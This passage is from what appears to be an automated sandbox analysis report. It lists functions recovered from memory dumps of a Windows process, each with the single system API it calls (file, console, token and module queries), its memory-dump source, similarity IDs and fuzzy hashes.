                                                        • Opcode Fuzzy Hash: 1918a412a803c5c5d4074e84e9e3e256c41d6575793a34f08073e5c3a61d1279
                                                        • Instruction Fuzzy Hash: 1911E075008380AFDB228F15DC45F52FFB4EF06220F09808EEE844B263C275A918CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DFB2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01DFB329
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: 2cd1a30c97806f9abf96903f8701866ea8f310ec8f059150a361936302d11719
                                                        • Instruction ID: a1988d87588805058536852ab3a6935e3638ebfddedefa7bf961ef135b207576
                                                        • Opcode Fuzzy Hash: 2cd1a30c97806f9abf96903f8701866ea8f310ec8f059150a361936302d11719
                                                        • Instruction Fuzzy Hash: 5301AD36400700DFEB219F09D885B61FBE0EF18721F08C09EDE890B612D271E518DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02840118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 028401D0
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: fd15a4f5e193db3bfc2790009858a33b1429b2b9332ac91d92704f95b3a1fe6a
                                                        • Instruction ID: f2f1f4bfb87c7f549718d2aaf1849eebfcf9dc434c079f178b424c4513129d99
                                                        • Opcode Fuzzy Hash: fd15a4f5e193db3bfc2790009858a33b1429b2b9332ac91d92704f95b3a1fe6a
                                                        • Instruction Fuzzy Hash: 51314A7A50E3C48FE7138B759C65692BFB4AF43210F0E84DBD984CF1A3D6299809D762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0284067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0284072D
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 8a0c79913a2b64bf8e041b67a81b8fe8024791faa510b4a35a24d8238df8331b
                                                        • Instruction ID: 37268ba5b70879353c327ae971e34b7088a95252a7e50396f0f67693ed40cfa3
                                                        • Opcode Fuzzy Hash: 8a0c79913a2b64bf8e041b67a81b8fe8024791faa510b4a35a24d8238df8331b
                                                        • Instruction Fuzzy Hash: 84317275505344AFE722CF65CC45F52BFF8EF05210F09849EE988CB292D335A808CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02840D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02840DD6
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: d62129e4f98f562d94df213f14bac1e530593e2ed1ba90a1e863a6cc53b8d53c
                                                        • Instruction ID: fdcf9379848e01218d9ddf7d9f49cf162443dc4c97fd48e70e8061ddfd6227db
                                                        • Opcode Fuzzy Hash: d62129e4f98f562d94df213f14bac1e530593e2ed1ba90a1e863a6cc53b8d53c
                                                        • Instruction Fuzzy Hash: 2031E8B5509384AFE712CB25CC45B96BFE8DF06214F0884AAE948CF293D775A909C772
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DFBD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,9B028BEA,00000000,00000000,00000000,00000000), ref: 01DFBDBC
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: 81eb3629cd484a5737e045277b80b644d6a81d3d375c1ac7143eb252503db25c
                                                        • Instruction ID: 88b1b0087ca50baa89d25aea974a187866a6da5cd72468cbee40b25497e6c31b
                                                        • Opcode Fuzzy Hash: 81eb3629cd484a5737e045277b80b644d6a81d3d375c1ac7143eb252503db25c
                                                        • Instruction Fuzzy Hash: 2B31C372009380AFE722CB60CC55F96BFB8EF06210F0984DBF985CB193D224A908C7B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DFAF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,9B028BEA,00000000,00000000,00000000,00000000), ref: 01DFAFBE
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: 86aacf66b767ea7c56084644dd8749ca56a2c949ae6fa20399c1fd6621b2a95c
                                                        • Instruction ID: 2bb7f0162932e417574f3cfbde4f1b11eec1a74882c6430f5634f0b3f1a4889f
                                                        • Opcode Fuzzy Hash: 86aacf66b767ea7c56084644dd8749ca56a2c949ae6fa20399c1fd6621b2a95c
                                                        • Instruction Fuzzy Hash: 5921A2B2509380AFE7128B24DC45B96BFB8EF06320F0984DBE985DB193D265A949C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02840FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0284109E
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: c0855ab33962e6d27b17a07d2ae99cecac5cf724be2da50f59fe8e52f1d96057
                                                        • Instruction ID: 42c53b499ca78f4168bf0161e2222ea03a40e335a388c243d172f1cfd4e1307b
                                                        • Opcode Fuzzy Hash: c0855ab33962e6d27b17a07d2ae99cecac5cf724be2da50f59fe8e52f1d96057
                                                        • Instruction Fuzzy Hash: 0A31617550E3C05FD3138B358C55B55BFB4AF43610F1A81DBD8848F1A3D629A919C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DFB01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,9B028BEA,00000000,00000000,00000000,00000000), ref: 01DFB0AE
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: a9549a8c4492a94271296845c8cab75ef13960c4216796002579a0c0c8b66b3c
                                                        • Instruction ID: a3c34b719fc601f06c4dd9f9b53f237fab338d7a7c9dac9595267dcee00abd94
                                                        • Opcode Fuzzy Hash: a9549a8c4492a94271296845c8cab75ef13960c4216796002579a0c0c8b66b3c
                                                        • Instruction Fuzzy Hash: 9221A171509380AFE722CF15CC45FA6BFB8EF46220F0984ABE945DB192D664E908CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DFA1A8, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01DFA23E
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        • Opcode ID: ceb69b8e9412bfda27086421084883eeb0369ffd8db41c51364c158315bb4208
                                                        • Instruction ID: 5f5e96b08074f36e8222bbf377c0d97cb166f61f7a2b5ec6d911234d91cc117d
                                                        • Opcode Fuzzy Hash: ceb69b8e9412bfda27086421084883eeb0369ffd8db41c51364c158315bb4208
                                                        • Instruction Fuzzy Hash: EF21B57550D3C1AFD312CB258C55B66BFB4EF47620F0981DBD8848F293D229A919C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02840784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,9B028BEA,00000000,00000000,00000000,00000000), ref: 02840819
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: 6bfb9f4a46f7e5495c48a42d87c081c6c661e81c013de71a003158de641eb73f
                                                        • Instruction ID: 2cc3bd2396f38fb1b0f9f88ea00999d9c2852cc5b4464dc9de76e23e06850b7d
                                                        • Opcode Fuzzy Hash: 6bfb9f4a46f7e5495c48a42d87c081c6c661e81c013de71a003158de641eb73f
                                                        • Instruction Fuzzy Hash: FA21FCB6408784AFE712CB159C45FA3BFA8EF46720F0981DBF9858F193D624A909C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02840464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02840502
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: bc922266ef1456bf706d4717a8cfbb4066c110640a6382c6bc0747da6d86be1f
                                                        • Instruction ID: 2897639dfaf8ea62bdbc93591be9302b67e71264235f5d1109a702d6ae7732be
                                                        • Opcode Fuzzy Hash: bc922266ef1456bf706d4717a8cfbb4066c110640a6382c6bc0747da6d86be1f
                                                        • Instruction Fuzzy Hash: F221607540E3C0AFD3128B258C55B62BFB4EF47610F1A81CBD8848F693D225A919C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028406AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0284072D
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: d4e0a5957df84532c37a0c05abb8ecd6b6abc852f246b4579bdb9b5d013880f5
                                                        • Instruction ID: f3bf52951ea7ac81688380e0e2a173a1c32965df5c86018554028c00564f562f
                                                        • Opcode Fuzzy Hash: d4e0a5957df84532c37a0c05abb8ecd6b6abc852f246b4579bdb9b5d013880f5
                                                        • Instruction Fuzzy Hash: FF217C79500704EFE721DF65CC85F66FBE8EF08650F04846AEA49CB292D772E904CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02840854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,9B028BEA,00000000,00000000,00000000,00000000), ref: 028408E5
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 01cffdeee7610ecd8b1923f237545680f7c63f7c3184d417a36c3db3ede8b7c9
                                                        • Instruction ID: 37711239bfd28ebd422c5131fc99440b984cf94aabbf607fb2835661db74d652
                                                        • Opcode Fuzzy Hash: 01cffdeee7610ecd8b1923f237545680f7c63f7c3184d417a36c3db3ede8b7c9
                                                        • Instruction Fuzzy Hash: 8A21B276409380AFE722CF50DC45F96FFB8EF46310F09849BE9448B153C225A909CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DFA8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01DFA94A
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        • Opcode ID: 51c927c7ba6cfa28c3749e25d50a9db96d9faff27de6b20c0ce5f7abf2e85506
                                                        • Instruction ID: 7586aa02582bffac3555de6378dda8adcb1555bd22e4f2e76f1ace091dd3ce4e
                                                        • Opcode Fuzzy Hash: 51c927c7ba6cfa28c3749e25d50a9db96d9faff27de6b20c0ce5f7abf2e85506
                                                        • Instruction Fuzzy Hash: CB21A77540D780AFD3138B25DC51B62BFB8EF87720F0981DBE8848B653D224A919C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02840D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02840DD6
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: 999dbc677eeb2cf2e09a4ccf5fac481d8a979dbb3fa316a0a42e2aabe1a6ec0e
                                                        • Instruction ID: e91d91b759cb8ddd7bea534c2fa5604cdeb90c56b9b5f75b08f52976b018b051
                                                        • Opcode Fuzzy Hash: 999dbc677eeb2cf2e09a4ccf5fac481d8a979dbb3fa316a0a42e2aabe1a6ec0e
                                                        • Instruction Fuzzy Hash: BA21A179504304AFF724DF25DC85BA7FBD8EF04214F04856AE948DB282D775F904CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DFBD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,9B028BEA,00000000,00000000,00000000,00000000), ref: 01DFBDBC
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: 2166e1cc46ebac14ad70c7d49ce38f844dc5b9684d8079fb0a5674b738ade964
                                                        • Instruction ID: da9ac0301e1601be71ec52f8a987ff1b49018c1b0a3550d7e162ef77d2a99110
                                                        • Opcode Fuzzy Hash: 2166e1cc46ebac14ad70c7d49ce38f844dc5b9684d8079fb0a5674b738ade964
                                                        • Instruction Fuzzy Hash: 3E119072500304EFEB21DF55DC85FA6F7ACEF04320F04856AFA459A141D670A9048BB2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02840F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02840FB0
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: e07c808fb4b33520177c2d97dba41219c049ddf13283af66ea0df7a94f9e0a51
                                                        • Instruction ID: 4ec2eabc9a29a48825dd9bbe6a8d850e3191693ff48143b820d4a9c910f41601
                                                        • Opcode Fuzzy Hash: e07c808fb4b33520177c2d97dba41219c049ddf13283af66ea0df7a94f9e0a51
                                                        • Instruction Fuzzy Hash: F4218E7950D3C49FDB12CB25CC55B92BFB4AF13214F0C84EAD988CF693D2689408C762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0284137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: 545ab31aa574e66be1f0b29f28398165b4ac73baa797b564af2bb7de57e63f36
                                                        • Instruction ID: c5c746c8fd2b52b4232511ccef5f4171dff6517fbd9408f3f8dde3f76cc59581
                                                        • Opcode Fuzzy Hash: 545ab31aa574e66be1f0b29f28398165b4ac73baa797b564af2bb7de57e63f36
                                                        • Instruction Fuzzy Hash: 0F21A4765083809FDB21CF25DC45B96FFF4EF06220F08849EED898B562D335A448DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DFB04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,9B028BEA,00000000,00000000,00000000,00000000), ref: 01DFB0AE
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: e331e5d1669b09c71cb53d24a831a8da841d81bbb43714d065aad7261958bb06
                                                        • Instruction ID: 14571749eb0bab1dd68bc88d0dc3dab6068cff42788720467e269d38b24b9eb8
                                                        • Opcode Fuzzy Hash: e331e5d1669b09c71cb53d24a831a8da841d81bbb43714d065aad7261958bb06
                                                        • Instruction Fuzzy Hash: B711B175600300EFEB21CF15DC85FA6FBE8EF05220F04846BEE05CB241D670EA048A71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DFBABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        • Opcode ID: dafdf9438aa85de4e22681e881dd55ebd02ed2490d58461172967a35b2c01f62
                                                        • Instruction ID: df2ea8884df62fb0c1bfc231bace2506b896439f74641f345c0e462e268ad519
                                                        • Opcode Fuzzy Hash: dafdf9438aa85de4e22681e881dd55ebd02ed2490d58461172967a35b2c01f62
                                                        • Instruction Fuzzy Hash: 5A21A1765093C49FEB128B25DC55A92BFE4EF07220F0984DBDD858F263D234A908DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DFAAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01DFAB1A
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: dd24e4d5fbe4034df2c281a08d3c8d249799e95b1539b6bd66f9ae1064d0a112
                                                        • Instruction ID: dccd25a9caf05be8ace3bb5ddadfdead292d50c2508321b44b173271230c0e24
                                                        • Opcode Fuzzy Hash: dd24e4d5fbe4034df2c281a08d3c8d249799e95b1539b6bd66f9ae1064d0a112
                                                        • Instruction Fuzzy Hash: A62175756053849FD722CF29DC45B52BFE8EF56210F09849EED49CB252D275E408C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028410D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02841148
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: 1d6276b85d4c241a27b290cb54573131aa59aee281eadb976123618607087d8f
                                                        • Instruction ID: d185cbd7727afffc89ddada2f701186e5b0ad31f28aa0907452f8e78f7f29486
                                                        • Opcode Fuzzy Hash: 1d6276b85d4c241a27b290cb54573131aa59aee281eadb976123618607087d8f
                                                        • Instruction Fuzzy Hash: 5F216D6540D3C4AFD7138B259C54A62BFB4EF57620F0980DBD8898F2A3D6696808D772
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DFAF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,9B028BEA,00000000,00000000,00000000,00000000), ref: 01DFAFBE
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: 69af0f2c97ab20f2faff4ef2770793fe2b0db0b75eff0d6d875df692c1cd83d5
                                                        • Instruction ID: a106bf333c428a80d93a44c72caff49a2dc82b6455d6677150027a1c5c55821f
                                                        • Opcode Fuzzy Hash: 69af0f2c97ab20f2faff4ef2770793fe2b0db0b75eff0d6d875df692c1cd83d5
                                                        • Instruction Fuzzy Hash: BD11C172500300EFEB21DF55DC85FA6FBA8EF45760F18846AFE498B281D670A9048BB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02840886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,9B028BEA,00000000,00000000,00000000,00000000), ref: 028408E5
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 420919e66ba5c5af235d4026834e2dbac994921cbe72ba87524a43fd4071823f
                                                        • Instruction ID: 6f1bf979357e3014f0e8fda49011e9d5feb7b54960357e5588b668c06526d9cc
                                                        • Opcode Fuzzy Hash: 420919e66ba5c5af235d4026834e2dbac994921cbe72ba87524a43fd4071823f
                                                        • Instruction Fuzzy Hash: 7E11EF7A000308EFEB21CF50DC41FA7FBA8EF54321F04885AEE099A241C670A504CBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DFBA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01DFBA7E
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 2230dbdc9871284da00ea762fd82899f1407345278c16c61eb7821a6d71e859c
                                                        • Instruction ID: e1c1b82dfac33a1521eda7909a6522689496470a44c1af263b5c291db9d240f6
                                                        • Opcode Fuzzy Hash: 2230dbdc9871284da00ea762fd82899f1407345278c16c61eb7821a6d71e859c
                                                        • Instruction Fuzzy Hash: 13119D72508380AFDB22CF65CC45B52FFF4EF09210F09849EEA898B662D375A418CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028412D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0284132F
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: 7624c408bf28de7640fc06f0f1b3c30b14a05d32fe5f76d6a09d5cd971532e33
                                                        • Instruction ID: 45f885b66d3770afd288e714526b87a245d3ec6b1526b0c786a74d9a78e30af8
                                                        • Opcode Fuzzy Hash: 7624c408bf28de7640fc06f0f1b3c30b14a05d32fe5f76d6a09d5cd971532e33
                                                        • Instruction Fuzzy Hash: C111C4755083849FDB118F15DC49B96FFE4EF06220F0884EEED498B252D235A408CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DFA33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        • Opcode ID: ec2077c94c2534eebebaa9283b94878d8a595276e4fcb97ff043972bf1a08f2d
                                                        • Instruction ID: c7c4e80ecd15859bc1f0a9a8b741a139e27acfcf80dd3ad7e733dff110844392
                                                        • Opcode Fuzzy Hash: ec2077c94c2534eebebaa9283b94878d8a595276e4fcb97ff043972bf1a08f2d
                                                        • Instruction Fuzzy Hash: ED118F714093C09FE7128B15DC54AA2BFB4DF47614F0980CBEDC94F253D265A908DB72
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028405E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02840640
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: 688def89c0366f794a71c13e109cc13858b20bbadb2be3a9da7269c68bb93b0b
                                                        • Instruction ID: e1a544289f53f3628aa0700819816944ec529908abb8a459f19c9ec181ab30d2
                                                        • Opcode Fuzzy Hash: 688def89c0366f794a71c13e109cc13858b20bbadb2be3a9da7269c68bb93b0b
                                                        • Instruction Fuzzy Hash: 0E11C6755093C49FD7128B15DC55B52FFB4DF53220F0880DBED858B653D275A908CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0284092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0284099C
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 0f28281fd2993e4b21fae60d2475b1a2e3cb3ec5442cfae32ff574b10e43a399
                                                        • Instruction ID: f580d4b698599b5a4316b7867c5a170a006011a79674a9caba31b9410e58d84e
                                                        • Opcode Fuzzy Hash: 0f28281fd2993e4b21fae60d2475b1a2e3cb3ec5442cfae32ff574b10e43a399
                                                        • Instruction Fuzzy Hash: 5111BF754093C49FE712CB25DC55B92FFB4EF17324F0980DADD888B263D265A908CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DFAAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01DFAB1A
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: 5ea7d996aac74b274a1a8e590bbdba23e161a39ebf981ce35bfb9e681cfc58b2
